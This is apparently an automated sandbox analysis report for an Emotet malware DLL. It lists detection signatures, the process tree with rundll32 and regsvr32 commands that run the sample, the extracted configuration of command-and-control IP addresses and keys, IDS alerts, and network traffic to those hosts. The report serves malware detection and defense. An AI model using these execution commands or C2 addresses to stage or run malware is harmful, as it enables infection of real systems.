Loading ...

Play interactive tourEdit tour

Windows Analysis Report xxWrY2YG7s

Overview

General Information

Sample Name:xxWrY2YG7s (renamed file extension from none to dll)
Analysis ID:553140
MD5:9abf4d1ba2a69aa4188ced6fb4603521
SHA1:96c629d97003101dc767dea1904906f0d1d397f1
SHA256:d3812d7714e2ef78ddeec78ccc9384d41dd3a36e61b2724b0da81833e750df58
Tags:32dllexe
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Sigma detected: Suspicious Call by Ordinal
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6472 cmdline: loaddll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6492 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6512 cmdline: rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6580 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 6820 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bcdsqhgufomb\pnioy.zya",aBwRbswnSV MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
            • rundll32.exe (PID: 6900 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bcdsqhgufomb\pnioy.zya",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 6500 cmdline: regsvr32.exe /s C:\Users\user\Desktop\xxWrY2YG7s.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • rundll32.exe (PID: 6572 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6544 cmdline: rundll32.exe C:\Users\user\Desktop\xxWrY2YG7s.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 6916 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 524 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 512 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6740 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6780 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6864 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6472 -ip 6472 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4308 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6472 -ip 6472 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 7084 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2840 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3224 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 3216 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 4396 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 248 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6760 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6752 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6944 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6600 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.304824769.00000000050E1000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000005.00000002.304733316.00000000050B0000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000005.00000002.305003073.00000000051E1000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        0000000D.00000002.778909402.0000000005431000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000000.00000000.286552378.0000000001500000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 55 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            13.2.rundll32.exe.5120000.14.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              7.2.rundll32.exe.4850000.9.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                13.2.rundll32.exe.4ee0000.9.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  13.2.rundll32.exe.4f10000.10.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    13.2.rundll32.exe.b50000.2.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 85 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6492, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1, ProcessId: 6512

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 7.2.rundll32.exe.c20000.1.unpackMalware Configuration Extractor: Emotet {"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: xxWrY2YG7s.dllVirustotal: Detection: 35%Perma Link
                      Source: xxWrY2YG7s.dllReversingLabs: Detection: 41%
                      Antivirus detection for URL or domainShow sources
                      Source: https://45.138.98.34/Avira URL Cloud: Label: malware
                      Source: https://45.138.98.34:80/agTEyDHCnXsPfzGXJQYZqenIQJAvira URL Cloud: Label: malware
                      Source: https://45.138.98.34:80/agTEyDHCnXsPfzGXJQYZqenIQAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: https://45.138.98.34/Virustotal: Detection: 10%Perma Link
                      Machine Learning detection for sampleShow sources
                      Source: xxWrY2YG7s.dllJoe Sandbox ML: detected
                      Source: xxWrY2YG7s.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: iphlpapi.pdb7 source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: ws2_32.pdbM source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.267840034.0000000004F77000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.292394761.0000000002B65000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.292304746.0000000004489000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293332674.0000000002B65000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297296027.00000000048A8000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297200362.00000000048A8000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000E.00000003.272363326.0000000005402000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297296027.00000000048A8000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297200362.00000000048A8000.00000004.00000040.sdmp
                      Source: Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000E.00000002.281739906.00000000030A2000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000E.00000003.272409759.0000000005405000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272363326.0000000005402000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297190009.00000000048A2000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293551321.0000000002B5F000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.292377523.0000000002B5F000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000E.00000003.272409759.0000000005405000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272363326.0000000005402000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297190009.00000000048A2000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb/ source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297296027.00000000048A8000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297200362.00000000048A8000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000014.00000003.297190009.00000000048A2000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000E.00000003.272404509.0000000005400000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297190009.00000000048A2000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb_ source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000E.00000003.272404509.0000000005400000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000E.00000003.272404509.0000000005400000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297190009.00000000048A2000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297271185.00000000048A5000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.292410735.0000000002B6B000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293341268.0000000002B6B000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293486034.0000000002B6B000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297296027.00000000048A8000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297200362.00000000048A8000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000E.00000003.272363326.0000000005402000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000E.00000003.272404509.0000000005400000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297249058.00000000048A0000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000E.00000003.272404509.0000000005400000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000014.00000003.292410735.0000000002B6B000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293341268.0000000002B6B000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293486034.0000000002B6B000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297249058.00000000048A0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.292394761.0000000002B65000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.293332674.0000000002B65000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297249058.00000000048A0000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.272356173.0000000005291000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.297171798.0000000004741000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb) source: WerFault.exe, 0000000E.00000003.272371296.0000000005408000.00000004.00000040.sdmp, WerFault.exe, 0000000E.00000003.272414115.0000000005408000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000014.00000003.297190009.00000000048A2000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.297271185.00000000048A5000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.293551321.0000000002B5F000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.292377523.0000000002B5F000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.5:49757 -> 45.138.98.34:80
                      Source: TrafficSnort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.5:49758 -> 69.16.218.101:8080
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.16.218.101 144Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.138.98.34 80Jump to behavior
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 45.138.98.34:80
                      Source: Malware configuration extractorIPs: 69.16.218.101:8080
                      Source: Malware configuration extractorIPs: 51.210.242.234:8080
                      Source: Malware configuration extractorIPs: 185.148.168.220:8080
                      Source: Malware configuration extractorIPs: 142.4.219.173:8080
                      Source: Malware configuration extractorIPs: 54.38.242.185:443
                      Source: Malware configuration extractorIPs: 191.252.103.16:80
                      Source: Malware configuration extractorIPs: 104.131.62.48:8080
                      Source: Malware configuration extractorIPs: 62.171.178.147:8080
                      Source: Malware configuration extractorIPs: 217.182.143.207:443
                      Source: Malware configuration extractorIPs: 168.197.250.14:80
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 66.42.57.149:443
                      Source: Malware configuration extractorIPs: 210.57.209.142:8080
                      Source: Malware configuration extractorIPs: 159.69.237.188:443
                      Source: Malware configuration extractorIPs: 116.124.128.206:8080
                      Source: Malware configuration extractorIPs: 128.199.192.135:8080
                      Source: Malware configuration extractorIPs: 195.154.146.35:443
                      Source: Malware configuration extractorIPs: 185.148.168.15:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 207.148.81.119:8080
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 190.90.233.66:443
                      Source: Malware configuration extractorIPs: 78.46.73.125:443
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 37.59.209.141:8080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                      Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                      Source: Joe Sandbox ViewIP Address: 104.131.62.48 104.131.62.48
                      Source: global trafficTCP traffic: 192.168.2.5:49758 -> 69.16.218.101:8080
                      Source: unknownNetwork traffic detected: IP country count 12
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.98.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.98.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.138.98.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.16.218.101
                      Source: svchost.exe, 00000028.00000003.568532653.000002015079E000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
